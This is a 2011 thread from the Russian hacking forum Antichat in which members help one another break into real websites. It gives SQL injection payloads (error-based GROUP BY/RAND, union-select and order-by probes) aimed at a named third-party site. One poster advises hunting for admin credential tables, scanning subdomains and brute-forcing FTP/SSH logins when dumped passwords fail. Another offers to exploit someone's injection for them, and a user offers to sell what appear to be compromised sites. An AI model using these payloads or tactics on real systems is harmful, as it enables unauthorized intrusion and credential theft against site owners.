ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.05.2011, 15:45
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717
Репутация:
170
|
|
Tigger идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.
и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?
|
|
|
13.05.2011, 16:15
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от ZARO
ZARO said:
Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?
Кинь ссылку сюда или в личку, попробую раскрутить
|
|
|
|
13.05.2011, 16:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от zlo12
zlo12 said:
Tigger
идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.
и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?
Если отсутствуют, то возможно:
1) В другой БД
2) доступ в админку по данным из файла
3) Таблица названа не "admin" а к примеру "images_222". Ищи таблицы с условием что в ней есть колонки LIKE '%pass%' и т.д.
Если пасы не подходят:
1) Искать другую админку
2) Просканировать сабдомены
3) Пробрутить FTP \ SSH с использованием хакерской догадки. (Хакерская догадка нужна для подбора логина. Примеры: то что вытащил из скули, root, www, user() которого вытащил скули, site.ru, site, siteru, ftp, etc.....)
|
|
|
|
13.05.2011, 16:43
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
помогите разобраться:
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+OR+(SELECT+COUNT(*)+FROM+(SELEC T+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCA T(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))
как я понимаю это блинд, но она по идее выводит результаты в отчетах об ошибке, как ту можно еще вывод посмотреть? |
|
|
|
13.05.2011, 17:03
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
как я понимаю это блинд
С чего ты взял?
|
|
|
|
13.05.2011, 17:08
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от M_script
M_script said:
С чего ты взял?
потому что запросы ввиде:
+union+select+1,2,3,4,5,6,7,8,9--
+/!union+select+1,2,3,4,5,6,7,8,9--
не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
|
|
|
|
13.05.2011, 17:13
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
а group+by+ говорит что их 9
Сравни запросы:
Код:
Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+
Код:
Code:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+
Результат одинаковый
|
|
|
|
13.05.2011, 17:16
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу
Код:
Code:
http://board.salle.com.ua/index.php?catid=259
|
|
|
|
13.05.2011, 17:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от M_script
M_script said:
Сравни запросы:
Код:
Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+
Код:
Code:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+
Результат одинаковый а если так:
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+order+by+10--
Сообщение от None
http://board.salle.com.ua/index.php?catid=25+pohui+chto+ne+napishesh+9--+
|
|
|
|
13.05.2011, 17:17
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от winstrool
winstrool said:
потому что запросы ввиде:
+union+select+1,2,3,4,5,6,7,8,9--
+/!union+select+1,2,3,4,5,6,7,8,9--
не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
Думаю, что это Oracle.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
